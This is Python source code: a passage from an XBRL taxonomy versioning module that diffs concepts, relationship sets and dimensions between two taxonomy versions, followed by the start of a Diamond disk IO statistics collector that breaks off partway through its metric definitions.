key = (rel.linkrole, arcrole, resource.role, resource.xmlLang,
rel.linkQname, rel.qname, resource.qname) + \
XbrlUtil.attributes(dts, rel.arcElement,
exclusions=(XbrlConst.xlink, "use","priority","order","id")) + \
XbrlUtil.attributes(dts, resource,
exclusions=(XbrlConst.xlink))
resources[key] = resource
for key,label in fromResources.items():
fromText = XmlUtil.innerText(label)
if key not in toResources:
action = self.createConceptEvent(vercd, event + "Delete", fromConcept, None, action, fromResource=label, fromResourceText=fromText)
else:
toLabel = toResources[key]
toText = XmlUtil.innerText(toLabel)
if not XbrlUtil.sEqual(self.fromDTS, label, toLabel, excludeIDs=XbrlUtil.ALL_IDs_EXCLUDED, dts2=self.toDTS, ns2ns1Tbl=self.namespaceRenameToURI):
action = self.createConceptEvent(vercd, event + "Change", fromConcept, toConcept, action, fromResource=label, toResource=toResources[key], fromResourceText=fromText, toResourceText=toText)
for key,label in toResources.items():
toText = XmlUtil.innerText(label)
if key not in fromResources:
action = self.createConceptEvent(vercd, event + "Add", None, toConcept, action, toResource=label, toResourceText=toText)
#
else:
self.createConceptEvent(vercu, "vercu:conceptDelete", fromConcept=fromConcept)
for toConceptQname, toConcept in self.toDTS.qnameConcepts.items():
if ((toConcept.isItem or toConcept.isTuple) and
toConceptQname not in toConceptsMatched):
self.createConceptEvent(vercu, "vercu:conceptAdd", toConcept=toConcept)
def diffRelationshipSet(self, arcrole):
# compare ELRs for new/removed
fromLinkRoleUris = set()
toLinkRoleUris = set()
for dts, linkRoleUris in ((self.fromDTS, fromLinkRoleUris),
(self.toDTS, toLinkRoleUris) ):
for linkroleUri in dts.relationshipSet(arcrole).linkRoleUris:
linkRoleUris.add(linkroleUri)
# removed, added ELRs
for dts, linkRoleUris, otherRoleUris, roleChanges, e1, e2, isFrom in (
(self.fromDTS, fromLinkRoleUris, toLinkRoleUris, self.roleChangeFromURI, "relationshipSetModelDelete", "fromRelationshipSet", True),
(self.toDTS, toLinkRoleUris, fromLinkRoleUris, self.roleChangeToURI, "relationshipSetModelAdd", "toRelationshipSet", False)):
for linkRoleUri in linkRoleUris:
if not (linkRoleUri in otherRoleUris or linkRoleUri in roleChanges):
# fromUri tree is removed
relSetEvent = None
relationshipSet = dts.relationshipSet(arcrole, linkRoleUri)
for rootConcept in relationshipSet.rootConcepts:
if relSetEvent is None:
relSetMdlEvent = self.createRelationshipSetEvent(e1)
relSetEvent = self.createRelationshipSetEvent(e2, eventParent=relSetMdlEvent)
rs = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=linkRoleUri, arcrole=arcrole)
self.createRelationshipSetEvent("relationships", eventParent=rs, fromConcept=rootConcept, axis="descendant-or-self", comment="root relationship")
elif isFrom: # role in both, compare hierarchies
self.relSetAddedEvent = None
self.relSetDeletedEvent = None
otherLinkRoleUri = roleChanges[linkRoleUri] if linkRoleUri in roleChanges else linkRoleUri
fromRelationshipSet = dts.relationshipSet(arcrole, linkRoleUri)
toRelationshipSet = self.toDTS.relationshipSet(arcrole, otherLinkRoleUri)
fromRoots = fromRelationshipSet.rootConcepts
toRoots = toRelationshipSet.rootConcepts
for fromRoot in fromRoots:
toRootConcept = self.toDTS.qnameConcepts.get(self.toDTSqname(fromRoot.qname))
if toRootConcept is not None and toRootConcept not in toRoots: # added qname
if self.relSetDeletedEvent is None:
relSetMdlEvent = self.createRelationshipSetEvent("relationshipSetModelDelete")
relSetEvent = self.createRelationshipSetEvent("fromRelationshipSet", eventParent=relSetMdlEvent)
self.relSetDeletedEvent = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=linkRoleUri, arcrole=arcrole)
self.createRelationshipSetEvent("relationships", eventParent=self.relSetDeletedEvent, fromConcept=fromRoot, axis="descendant-or-self")
else:
# check hierarchies
self.diffRelationships(fromRoot, toRootConcept, fromRelationshipSet, toRelationshipSet)
for toRoot in toRoots:
fromRootConcept = self.fromDTS.qnameConcepts.get(self.fromDTSqname(toRoot.qname))
if fromRootConcept is not None and fromRootConcept not in fromRoots: # added qname
if self.relSetAddedEvent is None:
relSetMdlEvent = self.createRelationshipSetEvent("relationshipSetModelAdd")
relSetEvent = self.createRelationshipSetEvent("toRelationshipSet", eventParent=relSetMdlEvent)
self.relSetAddedEvent = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=toRelationshipSet.linkrole, arcrole=toRelationshipSet.arcrole)
self.createRelationshipSetEvent("relationships", eventParent=self.relSetAddedEvent, fromConcept=toRoot, axis="descendant-or-self", comment="root relationship")
def diffRelationships(self, fromConcept, toConcept, fromRelationshipSet, toRelationshipSet):
fromRels = fromRelationshipSet.fromModelObject(fromConcept)
toRels = toRelationshipSet.fromModelObject(toConcept)
for i, fromRel in enumerate(fromRels):
fromTgtConcept = fromRel.toModelObject
toTgtQname = self.toDTSqname(fromTgtConcept.qname) if fromTgtConcept is not None else None
toRel = toRels[i] if i < len(toRels) else None
if toRel is not None and isinstance(toRel.toModelObject, ModelConcept) and toRel.toModelObject.qname == toTgtQname:
fromRelAttrs = XbrlUtil.attributes(self.modelXbrl, fromRel.arcElement,
exclusions=relationshipSetArcAttributesExclusion)
toRelAttrs = XbrlUtil.attributes(self.modelXbrl, toRel.arcElement,
exclusions=relationshipSetArcAttributesExclusion,
ns2ns1Tbl=self.namespaceRenameToURI)
if fromRelAttrs != toRelAttrs:
fromAttrsSet = set(fromRelAttrs)
toAttrsSet = set(toRelAttrs)
relSetMdlEvent = self.createRelationshipSetEvent("relationshipSetModelChange")
relSetEvent = self.createRelationshipSetEvent("fromRelationshipSet", eventParent=relSetMdlEvent)
relSetChangedEvent = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=fromRelationshipSet.linkrole, arcrole=fromRelationshipSet.arcrole)
self.createRelationshipSetEvent("relationships", eventParent=relSetChangedEvent, fromConcept=fromConcept, toConcept=fromTgtConcept, attrValues=fromAttrsSet-toAttrsSet)
relSetEvent = self.createRelationshipSetEvent("toRelationshipSet", eventParent=relSetMdlEvent)
relSetChangedEvent = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=toRelationshipSet.linkrole, arcrole=toRelationshipSet.arcrole)
self.createRelationshipSetEvent("relationships", eventParent=relSetChangedEvent, fromConcept=toConcept, toConcept=toRel.toModelObject, attrValues=toAttrsSet-fromAttrsSet)
else:
self.diffRelationships(fromTgtConcept, toRel.toModelObject, fromRelationshipSet, toRelationshipSet)
else:
if self.relSetDeletedEvent is None:
relSetMdlEvent = self.createRelationshipSetEvent("relationshipSetModelDelete")
relSetEvent = self.createRelationshipSetEvent("fromRelationshipSet", eventParent=relSetMdlEvent)
self.relSetDeletedEvent = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=fromRelationshipSet.linkrole, arcrole=fromRelationshipSet.arcrole)
if toRel is not None:
comment = _('corresponding relationship {0} toDTS toName="{1}"').format(i+1, XmlUtil.addQnameValue(self.reportElement, toRel.toModelObject.qname))
else:
comment = _('toDTS does not have a corresponding relationship at position {0}').format(i+1)
self.createRelationshipSetEvent("relationships", eventParent=self.relSetDeletedEvent, fromConcept=fromConcept, toConcept=fromTgtConcept, comment=comment)
for i, toRel in enumerate(toRels):
toTgtConcept = toRel.toModelObject
fromTgtQname = self.fromDTSqname(toTgtConcept.qname) if isinstance(toRel.toModelObject, ModelConcept) else None
fromRel = fromRels[i] if i < len(fromRels) else None
if fromRel is None or not isinstance(fromRel.toModelObject, ModelConcept) or fromRel.toModelObject.qname != fromTgtQname:
if self.relSetAddedEvent is None:
relSetMdlEvent = self.createRelationshipSetEvent("relationshipSetModelAdd")
relSetEvent = self.createRelationshipSetEvent("toRelationshipSet", eventParent=relSetMdlEvent)
self.relSetAddedEvent = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=toRelationshipSet.linkrole, arcrole=toRelationshipSet.arcrole)
if fromRel is not None:
comment = _('corresponding relationship {0} toDTS toName="{1}"').format(i+1, XmlUtil.addQnameValue(self.reportElement, fromRel.toModelObject.qname))
else:
comment = _('fromDTS does not have a corresponding relationship at position {0}').format(i+1)
self.createRelationshipSetEvent("relationships", eventParent=self.relSetAddedEvent, fromConcept=toConcept, toConcept=toTgtConcept, comment=comment)
def diffDimensionDefaults(self):
# dimension-defaults are global
fromDimDefaults = {}
toDimDefaults = {}
for dts, dimDefaults in ((self.fromDTS, fromDimDefaults),
(self.toDTS, toDimDefaults) ):
for rel in dts.relationshipSet(XbrlConst.dimensionDefault).modelRelationships:
dimDefaults[rel.fromModelObject.qname] = rel.toModelObject.qname
# removed, added defaults
for dts, dimDefaults, otherDimDefaults, otherDTSqname, e1, e2 in (
(self.fromDTS, fromDimDefaults, toDimDefaults, self.toDTSqname, "aspectModelDelete", "fromAspects"),
(self.toDTS, toDimDefaults, fromDimDefaults, self.fromDTSqname, "aspectModelAdd", "toAspects")):
aspectEvent = None
for fromDimQname, fromDefaultQname in dimDefaults.items():
otherDTSDimQname = otherDTSqname(fromDimQname)
otherDTSDefaultQname = otherDTSqname(fromDefaultQname)
if otherDTSDimQname not in otherDimDefaults or otherDimDefaults[otherDTSDimQname] != otherDTSDefaultQname:
# dim default is removed
if aspectEvent is None:
aspectMdlEvent = self.createInstanceAspectsEvent(e1)
aspectEvent = self.createInstanceAspectsEvent(e2, eventParent=aspectMdlEvent)
explDim = self.createInstanceAspectsEvent("explicitDimension", (('name',fromDimQname),), eventParent=aspectEvent)
# removed isDefault per Vers WG e-mail from Richard Ashby 2012-07-11
# self.createInstanceAspectsEvent("member", (('name',fromDefaultQname),('isDefaultMember','true')), eventParent=explDim, comment="dimension default")
def diffDimensions(self):
# DRS rels by (primary item,linkrole) of the has-hypercube relationship
fromDRSrels = defaultdict(list)
toDRSrels = defaultdict(list)
for dts, DRSrels in ((self.fromDTS, fromDRSrels), (self.toDTS, toDRSrels)):
for hasHcArcrole in (XbrlConst.all, XbrlConst.notAll):
for DRSrel in dts.relationshipSet(hasHcArcrole).modelRelationships:
if isinstance(DRSrel.fromModelObject, ModelConcept):
DRSrels[DRSrel.fromModelObject.qname,DRSrel.linkrole].append( DRSrel )
# removed, added pri item dimensions
for dts, DRSrels, otherDTS, otherDRSrels, otherDTSqname, roleChanges, e1, e2, isFrom in (
(self.fromDTS, fromDRSrels, self.toDTS, toDRSrels, self.toDTSqname, self.roleChangeFromURI, "aspectModelDelete", "fromAspects", True),
(self.toDTS, toDRSrels, self.fromDTS, fromDRSrels, self.fromDTSqname, self.roleChangeToURI, "aspectModelAdd", "toAspects", False)):
aspectEvent = None
for DRSkey, priItemDRSrels in DRSrels.items():
priItemQname, linkrole = DRSkey
priItemConcept = dts.qnameConcepts.get(priItemQname)
otherDTSpriItemQname = otherDTSqname(priItemQname)
otherDTSpriItemConcept = otherDTS.qnameConcepts.get(otherDTSpriItemQname)
otherLinkrole = roleChanges[linkrole] if linkrole in roleChanges else linkrole
otherDTSpriItemDRSrels = otherDRSrels.get((otherDTSpriItemQname, otherLinkrole))
# all dimensions in these DRSes are anded together
addDelEvent = changeEvent = False
if not otherDTSpriItemDRSrels: #every dim for this pri item is added/removed
aspectMdlEvent = self.createInstanceAspectsEvent(e1)
aspectEvent = self.createInstanceAspectsEvent(e2, eventParent=aspectMdlEvent)
priItemInheritRels = dts.relationshipSet(XbrlConst.domainMember, linkrole).fromModelObject(priItemConcept)
relatedConcepts = self.createInstanceAspectsEvent("concepts", eventParent=aspectEvent)
priItem = self.createInstanceAspectsEvent("concept", (('name',priItemQname),), eventParent=relatedConcepts)
if priItemInheritRels:
priItemNetwork = self.createInstanceAspectsEvent("drsNetwork",
(('linkrole',linkrole),
('arcrole',XbrlConst.domainMember),
('axis', 'descendant-or-self')),
eventParent=priItem)
for dimRel, isNotAll, isClosed in self.DRSdimRels(dts, priItemDRSrels):
dimConcept = dimRel.toModelObject
explDim = self.createInstanceAspectsEvent("typedDimension" if dimConcept.isTypedDimension else "explicitDimension",
(('name',dimConcept.qname),) + \
((('excluded','true'),) if isNotAll else ()),
comment=self.typedDomainElementComment(dimConcept),
eventParent=aspectEvent)
for domRel in self.DRSdomRels(dts, dimRel):
domHasMemRels = dts.relationshipSet(XbrlConst.domainMember, linkrole).fromModelObject(priItemConcept)
member = self.createInstanceAspectsEvent("member", (('name',domRel.toModelObject.qname),), eventParent=explDim)
if domHasMemRels:
self.createInstanceAspectsEvent("drsNetwork",
(('linkrole',domRel.linkrole),
('arcrole',XbrlConst.domainMember),
('axis', 'descendant-or-self')),
eventParent=member)
elif isFrom: # pri item in both, differences are found
# hypercube differences
hcDifferences = self.DRShcDiff(dts, priItemDRSrels, otherDTS, otherDTSpriItemDRSrels)
if hcDifferences:
relSetMdlEvent = self.createRelationshipSetEvent("relationshipSetModelChange")
for fromHcRel, toHcRel, fromAttrsSet, toAttrsSet in hcDifferences:
relSetEvent = self.createRelationshipSetEvent("fromRelationshipSet", eventParent=relSetMdlEvent)
relSetChangedEvent = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=fromHcRel.linkrole, arcrole=fromHcRel.arcrole)
self.createRelationshipSetEvent("relationships", eventParent=relSetChangedEvent, fromConcept=fromHcRel.fromModelObject, toConcept=fromHcRel.toModelObject, attrValues=fromAttrsSet-toAttrsSet)
relSetEvent = self.createRelationshipSetEvent("toRelationshipSet", eventParent=relSetMdlEvent)
relSetChangedEvent = self.createRelationshipSetEvent("relationshipSet", eventParent=relSetEvent, linkrole=toHcRel.linkrole, arcrole=toHcRel.arcrole)
self.createRelationshipSetEvent("relationships", eventParent=relSetChangedEvent, fromConcept=toHcRel.toModelObject, toConcept=toHcRel.toModelObject, attrValues=toAttrsSet-fromAttrsSet)
priItemDifferences = self.DRSdiff(priItemConcept, linkrole, otherDTSpriItemConcept, otherLinkrole, XbrlConst.domainMember)
if priItemDifferences:
for fromRel, toRel, fromAttrSet, toAttrSet in priItemDifferences:
if fromRel is not None:
if toRel is not None: e = "aspectModelChange"
else: e = "aspectModelDelete"
else: e = "aspectModelAdd"
aspectMdlEvent = self.createInstanceAspectsEvent(e)
for priQn, rel, attrSet, e in ((priItemQname, fromRel, fromAttrSet-toAttrSet, "fromAspects"),
(otherDTSpriItemQname, toRel, toAttrSet-fromAttrSet, "toAspects")):
if rel is not None:
aspectEvent = self.createInstanceAspectsEvent(e, eventParent=aspectMdlEvent)
priItemInheritRels = dts.relationshipSet(XbrlConst.domainMember, linkrole).fromModelObject(priItemConcept)
relatedConcepts = self.createInstanceAspectsEvent("concepts", eventParent=aspectEvent)
priItem = self.createInstanceAspectsEvent("concept", (('name',priQn),), eventParent=relatedConcepts)
if priItemInheritRels:
self.createInstanceAspectsEvent("drsNetwork",
(('linkrole',rel.linkrole),
('arcrole',XbrlConst.domainMember),
('axis', 'descendant-or-self')),
eventParent=priItem)
for dimRel, isNotAll, isClosed in self.DRSdimRels(dts, priItemDRSrels):
dimConcept = dimRel.toModelObject
explDim = self.createInstanceAspectsEvent("typedDimension" if dimConcept.isTypedDimension else "explicitDimension",
(('name',dimConcept.qname),) + \
((('excluded','true'),) if isNotAll else ()),
comment=self.typedDomainElementComment(dimConcept),
eventParent=aspectEvent)
for domRel in self.DRSdomRels(dts, dimRel):
domHasMemRels = dts.relationshipSet(XbrlConst.domainMember, linkrole).fromModelObject(priItemConcept)
member = self.createInstanceAspectsEvent("member", (('name',domRel.toModelObject.qname),), eventParent=explDim)
if domHasMemRels:
self.createInstanceAspectsEvent("drsNetwork",
(('linkrole',rel.linkrole),
('arcrole',XbrlConst.domainMember),
('axis', 'descendant-or-self')),
eventParent=member)
dimsDifferences = self.DRSdimsDiff(dts, priItemDRSrels, otherDTS, otherDTSpriItemDRSrels)
if dimsDifferences:
for fromDimRel, toDimRel, isNotAll, mbrDiffs in dimsDifferences:
if fromDimRel is not None:
if toDimRel is not None: e = "aspectModelChange"
else: e = "aspectModelDelete"
else: e = "aspectModelAdd"
aspectMdlEvent = self.createInstanceAspectsEvent(e)
for priQn, dimRel, e, isFrom in ((priItemQname, fromDimRel, "fromAspects", True),
(otherDTSpriItemQname, toDimRel, "toAspects", False)):
if dimRel is not None:
aspectEvent = self.createInstanceAspectsEvent(e, eventParent=aspectMdlEvent)
priItemInheritRels = dts.relationshipSet(XbrlConst.domainMember, linkrole).fromModelObject(priItemConcept)
relatedConcepts = self.createInstanceAspectsEvent("concepts", eventParent=aspectEvent)
priItem = self.createInstanceAspectsEvent("concept", (('name',priQn),), eventParent=relatedConcepts)
if priItemInheritRels:
self.createInstanceAspectsEvent("drsNetwork",
(('linkrole',linkrole),
('arcrole',XbrlConst.domainMember),
('axis', 'descendant-or-self')),
eventParent=priItem)
dimConcept = dimRel.toModelObject
explDim = self.createInstanceAspectsEvent("typedDimension" if dimConcept.isTypedDimension else "explicitDimension",
(('name',dimConcept.qname),) + \
((('excluded','true'),) if isNotAll else ()),
comment=self.typedDomainElementComment(dimConcept),
eventParent=aspectEvent)
if mbrDiffs:
for fromRel, toRel, fromAttrSet, toAttrSet in mbrDiffs:
if isFrom: rel = fromRel
else: rel = toRel
if rel is not None:
domHasMemRels = dts.relationshipSet(XbrlConst.domainMember, rel.linkrole).fromModelObject(rel.toModelObject)
member = self.createInstanceAspectsEvent("member", (('name',rel.toModelObject.qname),), eventParent=explDim)
if domHasMemRels:
self.createInstanceAspectsEvent("drsNetwork",
(('linkrole',rel.linkrole),
('arcrole',XbrlConst.domainMember),
('axis', 'descendant-or-self')),
eventParent=member)
else:
for domRel in self.DRSdomRels(dts, dimRel):
domHasMemRels = dts.relationshipSet(XbrlConst.domainMember, linkrole).fromModelObject(priItemConcept)
self.createInstanceAspectsEvent("member", (('name',domRel.toModelObject.qname),) + \
((('linkrole',domRel.linkrole),
('arcrole',XbrlConst.domainMember),
('axis', 'DRS-descendant-or-self')) if domHasMemRels else ()),
eventParent=explDim)
def DRSdimRels(self, dts, priItemDRSrels):
return [(dimRel, hcRel.arcrole == XbrlConst.notAll, hcRel.isClosed)
for hcRel in priItemDRSrels
for dimRel in dts.relationshipSet(XbrlConst.hypercubeDimension, hcRel.consecutiveLinkrole).fromModelObject(hcRel.toModelObject)]
def DRSdomRels(self, dts, dimRel):
return dts.relationshipSet(XbrlConst.dimensionDomain, dimRel.consecutiveLinkrole).fromModelObject(dimRel.toModelObject)
def DRSdiff(self, fromConcept, fromLinkrole, toConcept, toLinkrole, arcrole, diffs=None):
if diffs is None: diffs = []
fromRels = self.fromDTS.relationshipSet(arcrole, fromLinkrole).fromModelObject(fromConcept)
toRels = self.toDTS.relationshipSet(arcrole, toLinkrole).fromModelObject(toConcept)
if arcrole == XbrlConst.dimensionDomain: arcrole = XbrlConst.domainMember #consec rel set
for i, fromRel in enumerate(fromRels):
fromTgtConcept = fromRel.toModelObject
toTgtQname = self.toDTSqname(fromTgtConcept.qname) if fromTgtConcept is not None else None
toRel = toRels[i] if i < len(toRels) else None
if toRel is not None and isinstance(toRel.toModelObject, ModelConcept) and toRel.toModelObject.qname == toTgtQname:
toTgtConcept = toRel.toModelObject
fromRelAttrs = XbrlUtil.attributes(self.modelXbrl, fromRel.arcElement,
exclusions=relationshipSetArcAttributesExclusion)
toRelAttrs = XbrlUtil.attributes(self.modelXbrl, toRel.arcElement,
exclusions=relationshipSetArcAttributesExclusion,
ns2ns1Tbl=self.namespaceRenameToURI)
if fromRelAttrs != toRelAttrs:
diffs.append((fromRel, toRel, set(fromRelAttrs), set(toRelAttrs)))
else:
self.DRSdiff(fromTgtConcept, fromRel.consecutiveLinkrole,
toTgtConcept, toRel.consecutiveLinkrole,
arcrole, diffs)
else:
diffs.append((fromRel, None, set(), set()))
for i, toRel in enumerate(toRels):
toTgtConcept = toRel.toModelObject
fromTgtQname = self.fromDTSqname(toTgtConcept.qname) if isinstance(toRel.toModelObject, ModelConcept) else None
fromRel = fromRels[i] if i < len(fromRels) else None
if fromRel is None or not isinstance(fromRel.toModelObject, ModelConcept) or fromRel.toModelObject.qname != fromTgtQname:
diffs.append((None, toRel, set(), set()))
return diffs
def DRShcDiff(self, fromDTS, fromPriItemDRSrels, toDTS, toPriItemDRSrels):
fromHcRels = {}
toHcRels = {}
for dts, priItemDRSrels, hcRels in ((fromDTS, fromPriItemDRSrels, fromHcRels), (toDTS, toPriItemDRSrels, toHcRels)):
for hcRel in priItemDRSrels:
hcRels[hcRel.fromModelObject, hcRel.toModelObject, hcRel.arcrole == XbrlConst.notAll] = hcRel
diffs = []
for i, fromHcRelKey in enumerate(fromHcRels.keys()):
fromPriItemQname, fromHcQname, isNotAll = fromHcRelKey
toPriItemQname = self.toDTSqname(fromPriItemQname)
toHcQname = self.toDTSqname(fromHcQname)
try:
toHcRel = fromHcRels[toPriItemQname, toHcQname, isNotAll]
fromHcRel = fromHcRels[fromHcRelKey]
fromRelAttrs = XbrlUtil.attributes(self.modelXbrl, fromHcRel.arcElement,
exclusions=relationshipSetArcAttributesExclusion)
toRelAttrs = XbrlUtil.attributes(self.modelXbrl, toHcRel.arcElement,
exclusions=relationshipSetArcAttributesExclusion,
ns2ns1Tbl=self.namespaceRenameToURI)
if fromRelAttrs != toRelAttrs:
diffs.append( (fromHcRel, toHcRel, set(fromRelAttrs), set(toRelAttrs)) )
except KeyError:
pass # not tracking addition or removal of hypercubes
return diffs
def typedDomainIsDifferent(self, fromDimConcept, toDimConcept):
try:
return self.typedDomainsCorrespond[fromDimConcept, toDimConcept]
except KeyError:
fromTypedDomain = fromDimConcept.typedDomainElement
toTypedDomain = toDimConcept.typedDomainElement
isCorresponding = (fromTypedDomain is not None and toTypedDomain is not None and
XbrlUtil.sEqual(self.fromDTS, fromTypedDomain, toTypedDomain,
excludeIDs=XbrlUtil.ALL_IDs_EXCLUDED, dts2=self.toDTS, ns2ns1Tbl=self.namespaceRenameToURI))
self.typedDomainsCorrespond[fromDimConcept, toDimConcept] = isCorresponding
return isCorresponding
def typedDomainElementComment(self, dimConcept):
if dimConcept.isTypedDimension:
if dimConcept.typedDomainElement is not None:
return _('typed domain element {0}').format(dimConcept.typedDomainElement.qname)
else:
return _('typedDomainRef={0} (element qname cannot be determined)').format(dimConcept.typedDomainRef)
return None
def DRSdimsDiff(self, fromDTS, fromPriItemDRSrels, toDTS, toPriItemDRSrels):
fromDims = {}
toDims = {}
for dts, priItemDRSrels, dims in ((fromDTS, fromPriItemDRSrels, fromDims), (toDTS, toPriItemDRSrels, toDims)):
for dimRel, isNotAll, isClosed in self.DRSdimRels(dts, priItemDRSrels):
dims[dimRel.toModelObject.qname, isNotAll] = dimRel
diffs = []
for i, fromDimKey in enumerate(fromDims.keys()):
fromDimQname, fromIsNotAll = fromDimKey
fromDimRel = fromDims[fromDimKey]
fromDimConcept = fromDimRel.toModelObject
toDimQname = self.toDTSqname(fromDimQname)
toDimRel = toDims.get( (toDimQname, fromIsNotAll) )
if toDimRel is not None:
toDimConcept = toDimRel.toModelObject
mbrDiffs = self.DRSdiff(fromDimConcept, fromDimRel.consecutiveLinkrole,
toDimConcept, toDimRel.consecutiveLinkrole,
XbrlConst.dimensionDomain)
dimsCorrespond = True
if fromDimConcept.isTypedDimension:
if toDimConcept.isExplicitDimension or self.typedDomainIsDifferent(fromDimConcept, toDimConcept):
dimsCorrespond = False
elif toDimConcept.isTypedDimension:
dimsCorrespond = False
if mbrDiffs or not dimsCorrespond:
diffs.append((fromDimRel, toDimRel, fromIsNotAll, mbrDiffs))
else:
diffs.append((fromDimRel, None, fromIsNotAll, []))
for i, toDimKey in enumerate(toDims.keys()):
toDimQname, toIsNotAll = toDimKey
toDimRel = toDims[toDimKey]
fromDimQname = self.fromDTSqname(toDimQname)
if not fromDimQname or (fromDimQname, toIsNotAll) not in fromDims:
toDimConcept = fromDimRel.toModelObject
diffs.append((None, toDimRel, toIsNotAll, []))
return diffs
def toDTSqname(self, fromDTSqname):
if fromDTSqname is not None and fromDTSqname.namespaceURI in self.namespaceRenameFromURI:
return qname(self.namespaceRenameFromURI[fromDTSqname.namespaceURI],
fromDTSqname.localName)
return fromDTSqname
def fromDTSqname(self, toDTSqname):
if toDTSqname and toDTSqname.namespaceURI in self.namespaceRenameToURI:
return qname(self.namespaceRenameToURI[toDTSqname.namespaceURI],
toDTSqname.localName)
return toDTSqname
def createAction(self):
action = XmlUtil.addChild(self.reportElement, XbrlConst.ver, "ver:action", (("id","action{0:05}".format(self.actionNum) ),))
self.actionNum += 1
assignmentRef = XmlUtil.addChild(action, XbrlConst.ver, "ver:assignmentRef", (("ref","versioningTask"),) )
return action
def createBaseEvent(self, eventName, fromURI, toURI):
event = XmlUtil.addChild(self.createAction(), XbrlConst.ver, eventName)
XmlUtil.addChild(event, XbrlConst.ver, "ver:fromURI", ("value",fromURI))
XmlUtil.addChild(event, XbrlConst.ver, "ver:toURI", ("value",toURI))
def createConceptEvent(self, eventNS, eventName, fromConcept=None, toConcept=None, action=None, fromCustomAttribute=None, toCustomAttribute=None, fromResource=None, toResource=None, fromValue=None, toValue=None, fromResourceText=None, toResourceText=None):
if action is None:
action = self.createAction()
event = XmlUtil.addChild(action, eventNS, eventName)
if fromConcept is not None:
fromQname = XmlUtil.addQnameValue(self.reportElement, fromConcept.qname)
fromElt = XmlUtil.addChild(event, XbrlConst.vercu, "vercu:fromConcept", ("name", fromQname) )
if fromValue is not None:
XmlUtil.addComment(event, _("from value: {0} ").format(fromValue))
if fromResource is not None:
fromResElt = XmlUtil.addChild(event, XbrlConst.vercd, "vercd:fromResource", ("value",self.conceptHref(fromResource)) )
if fromResource.id is None and fromConcept is not None:
XmlUtil.addComment(event, _("({0} does not have an id attribute)").format(eventName))
if fromResourceText:
XmlUtil.addComment(event, fromResourceText)
if fromCustomAttribute is not None:
if fromCustomAttribute.namespaceURI: # has namespace
attQname = XmlUtil.addQnameValue(self.reportElement, fromCustomAttribute)
XmlUtil.addChild(event, XbrlConst.vercd, "vercd:fromCustomAttribute", (("name",attQname),) )
else: # no namespace
XmlUtil.addChild(event, XbrlConst.vercd, "vercd:fromCustomAttribute", (("name",fromCustomAttribute.localName),) )
if toConcept is not None:
toQname = XmlUtil.addQnameValue(self.reportElement, toConcept.qname)
toElt = XmlUtil.addChild(event, XbrlConst.vercu, "vercb:toConcept", ("name", toQname) )
if toValue is not None:
XmlUtil.addComment(event, _("to value: {0} ").format(toValue))
if toResource is not None:
toResElt = XmlUtil.addChild(event, XbrlConst.vercd, "vercd:toResource", ("value",self.conceptHref(toResource)) )
if toResource.id is None and toConcept is not None:
XmlUtil.addComment(event, _("({0} does not have an id attribute)").format(eventName))
if toResourceText:
XmlUtil.addComment(event, toResourceText)
if toCustomAttribute is not None:
if toCustomAttribute.namespaceURI: # has namespace
attQname = XmlUtil.addQnameValue(self.reportElement, toCustomAttribute)
XmlUtil.addChild(event, XbrlConst.vercd, "vercd:toCustomAttribute", (("name",attQname),) )
else: # no namespace
XmlUtil.addChild(event, XbrlConst.vercd, "vercd:toCustomAttribute", (("name",toCustomAttribute.localName),) )
return action
def conceptHref(self, concept):
return self.relativeUri(concept.modelDocument.uri) + "#" + XmlUtil.elementFragmentIdentifier(concept)
def createRelationshipSetEvent(self, eventName, linkrole=None, arcrole=None, fromConcept=None, toConcept=None, axis=None, attrValues=None, comment=None, eventParent=None):
if eventParent is None:
eventParent = self.createAction()
eventAttributes = []
if linkrole:
eventAttributes.append(("linkrole", linkrole))
if arcrole:
eventAttributes.append(("arcrole", arcrole))
if fromConcept is not None:
eventAttributes.append(("fromName", XmlUtil.addQnameValue(self.reportElement, fromConcept.qname)))
if toConcept is not None:
eventAttributes.append(("toName", XmlUtil.addQnameValue(self.reportElement, toConcept.qname)))
if axis:
eventAttributes.append(("axis", axis))
eventElement = XmlUtil.addChild(eventParent, XbrlConst.verrels, "verrels:" + eventName, attributes=eventAttributes)
if comment:
XmlUtil.addComment(eventParent, ' ' + comment + ' ')
if attrValues:
XmlUtil.addComment(eventParent, ' ' + ', '.join("{0[0]}='{0[1]}'".format(a) for a in sorted(attrValues)) + ' ')
return eventElement
def createInstanceAspectsEvent(self, eventName, eventAttributes=None, comment=None, eventParent=None):
if eventParent is None:
eventParent = self.createAction()
eventElement = XmlUtil.addChild(eventParent, XbrlConst.verdim, "verdim:" + eventName,
attributes=tuple((name,
(XmlUtil.addQnameValue(self.reportElement, val) if isinstance(val,QName) else val)
) for name, val in eventAttributes) if eventAttributes else None)
if comment is not None:
XmlUtil.addComment(eventParent, ' ' + comment + ' ')
return eventElement
|
|
# coding=utf-8
"""
Collect IO Stats
Note: You may need to artifically generate some IO load on a disk/partition
before graphite will generate the metrics.
* http://www.kernel.org/doc/Documentation/iostats.txt
#### Dependencies
* /proc/diskstats
"""
import diamond.collector
from diamond.collector import str_to_bool
import diamond.convertor
import time
import os
import re
try:
import psutil
psutil # workaround for pyflakes issue #13
except ImportError:
psutil = None
class DiskUsageCollector(diamond.collector.Collector):
READS = 'reads'
READS_MERGED = 'reads_merged'
READS_SECTORS = 'reads_sectors'
READS_MILLISECONDS = 'reads_milliseconds'
WRITES = 'writes'
WRITES_MERGED = 'writes_merged'
WRITES_SECTORS = 'writes_sectors'
WRITES_MILLISECONDS = 'writes_milliseconds'
IO_IN_PROGRESS = 'io_in_progress'
IO_MILLISECONDS = 'io_milliseconds'
IO_MILLISECONDS_WEIGHTED = 'io_milliseconds_weighted'
MAX_VALUES = {
READS: 4294967295,
READS_MERGED: 4294967295,
READS_MILLISECONDS: 4294967295,
WRITES: 4294967295,
WRITES_MERGED: 4294967295,
WRITES_MILLISECONDS: 4294967295,
IO_MILLISECONDS: 4294967295,
IO_MILLISECONDS_WEIGHTED: 4294967295
}
RAW_METRIC_NAMES = {
READS: 'num_reads',
READS_MERGED: 'merged_reads',
